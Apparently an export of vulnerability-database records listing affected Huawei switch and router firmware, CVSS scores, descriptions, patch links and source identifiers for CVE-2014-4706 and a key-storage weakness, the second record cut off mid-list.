                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:lsw_s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:campus_s5700_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:campus_s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:campus_s7700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:campus_s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300e_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300e:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2350_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2350:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2750_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2750:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:lsw_s9700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:lsw_s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:campus_s7700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:campus_s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300e_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300e:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:lsw_s9700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:lsw_s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2014-4706",
         },
      ],
   },
   cve: "CVE-2014-4706",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.8,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2014-4706",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "CNVD-2017-05106",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-72647",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.5,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2014-4706",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2014-4706",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2017-05106",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201704-211",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULHUB",
                  id: "VHN-72647",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05106",
         },
         {
            db: "VULHUB",
            id: "VHN-72647",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008276",
         },
         {
            db: "NVD",
            id: "CVE-2014-4706",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-211",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei Campus S3700HI with software V200R001C00SPC300; Campus S5700 with software V200R002C00SPC100; Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500; LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S2350 with software V200R003C00SPC300; S2750 with software V200R003C00SPC300; S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S5700 with software V200R001C00SPC300,V200R003C00SPC300; S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S7700 with software V200R001C00SPC300; S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S9300E with software V200R003C00SPC300,V200R003C00SPC500 allow attackers to keep sending malformed packets to cause a denial of service (DoS) attack, aka a heap overflow. plural Huawei Campus The product software contains a buffer error vulnerability.Service operation interruption (DoS) An attack may be carried out. Huawei's Campus switch is a series of switches introduced by Huawei. An attacker can exploit this vulnerability by using malformed packets to cause the device to restart abnormally. The following products and versions are affected: Huawei Campus S3700HI V200R001C00SPC300 Version; Campus S5700 V200R002C00SPC100 Version; Campus S7700 V200R003C00SPC300 Version, V200R003C00SPC500 Version; LSW S9700 V200R001C00SPC300 Version, V200R003C00SPC300 Version, V200R003C00SPC500 Version; S2350 V200R003C00SPC300 Version; S2750 V200R003C00SPC300 Version; S5300 V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; S5700 V200R001C00SPC300 Version, V200R003C00SPC300 Version; S6300 V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; S6700 S3300HI V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; S7700 V200R001C00SPC300 Version; S9300 V200R001C00SPC300 Version, V200R003C00SPC300 Version, V200R003C00SPC500 Version; S9300E V200R003C00SPC300 Version , V200R003C00SPC500 version",
      sources: [
         {
            db: "NVD",
            id: "CVE-2014-4706",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008276",
         },
         {
            db: "CNVD",
            id: "CNVD-2017-05106",
         },
         {
            db: "VULHUB",
            id: "VHN-72647",
         },
      ],
      trust: 2.25,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2014-4706",
            trust: 3.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008276",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-211",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2017-05106",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-72647",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05106",
         },
         {
            db: "VULHUB",
            id: "VHN-72647",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008276",
         },
         {
            db: "NVD",
            id: "CVE-2014-4706",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-211",
         },
      ],
   },
   id: "VAR-201704-0385",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05106",
         },
         {
            db: "VULHUB",
            id: "VHN-72647",
         },
      ],
      trust: 1.4777415505882354,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05106",
         },
      ],
   },
   last_update_date: "2023-12-18T12:44:40.100000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Huawei-SA-20140604-01-Campus",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/hw-343218",
         },
         {
            title: "Huawei Campus series switch heap buffer overflow vulnerability patch",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/92441",
         },
         {
            title: "Huawei Campus Repair of Series Switch Buffer Error Vulnerabilities",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=69057",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05106",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008276",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-211",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-119",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-72647",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008276",
         },
         {
            db: "NVD",
            id: "CVE-2014-4706",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.3,
            url: "http://www.huawei.com/en/psirt/security-advisories/hw-343218",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4706",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2014-4706",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05106",
         },
         {
            db: "VULHUB",
            id: "VHN-72647",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008276",
         },
         {
            db: "NVD",
            id: "CVE-2014-4706",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-211",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2017-05106",
         },
         {
            db: "VULHUB",
            id: "VHN-72647",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008276",
         },
         {
            db: "NVD",
            id: "CVE-2014-4706",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-211",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2017-04-23T00:00:00",
            db: "CNVD",
            id: "CNVD-2017-05106",
         },
         {
            date: "2017-04-02T00:00:00",
            db: "VULHUB",
            id: "VHN-72647",
         },
         {
            date: "2017-05-02T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2014-008276",
         },
         {
            date: "2017-04-02T20:59:00.280000",
            db: "NVD",
            id: "CVE-2014-4706",
         },
         {
            date: "2017-04-06T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201704-211",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2017-04-23T00:00:00",
            db: "CNVD",
            id: "CNVD-2017-05106",
         },
         {
            date: "2017-04-05T00:00:00",
            db: "VULHUB",
            id: "VHN-72647",
         },
         {
            date: "2017-05-02T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2014-008276",
         },
         {
            date: "2017-04-05T15:36:59.220000",
            db: "NVD",
            id: "CVE-2014-4706",
         },
         {
            date: "2017-04-06T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201704-211",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201704-211",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Campus Buffer error vulnerability in product software",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2014-008276",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "buffer overflow",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201704-211",
         },
      ],
      trust: 0.6,
   },
}

var-201610-0307
Vulnerability from variot

Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 makes it easier for remote authenticated administrators to obtain encryption keys and ciphertext passwords via vectors related to key storage. plural Huawei There is a vulnerability in the product software that allows the encryption key and ciphertext password to be obtained. Supplementary information : CWE Vulnerability type by CWE-326: Inadequate Encryption Strength ( Incorrect cipher strength ) Has been identified. Huawei AR Routers is an AR series router product from China Huawei. An information disclosure vulnerability exists in Huawei AR Routers. An attacker could exploit this vulnerability to obtain sensitive information. Huawei AR, etc. are routing switches of China Huawei (Huawei). Remote attackers can use the keystore to exploit this vulnerability to gain administrator privileges and crack hard-coded keys and ciphertext passwords. The following products and versions are affected: Huawei AR V200R001 , V200R002 , V200R003 , V200R005C10 , V200R005C20 , V200R005C30 ; Quidway S9300 V200R003C00SPC500 , V200R002C00SPC100 , V200R001C00SPC300 ; S12700 V200R006C00 , V200R005C00 ; S9300 V200R006C00SPC500 , V200R005C00SPC300 ; Quidway S5300 V200R001C00SPC300

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201610-0307",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c00spc300",
         },
         {
            model: "ar",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c20",
         },
         {
            model: "ar",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c10",
         },
         {
            model: "ar",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r006c00spc500",
         },
         {
            model: "ar",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r006c00spc500",
         },
         {
            model: "ar",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c30",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c00spc500",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "quidway s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "quidway s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "quidway s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
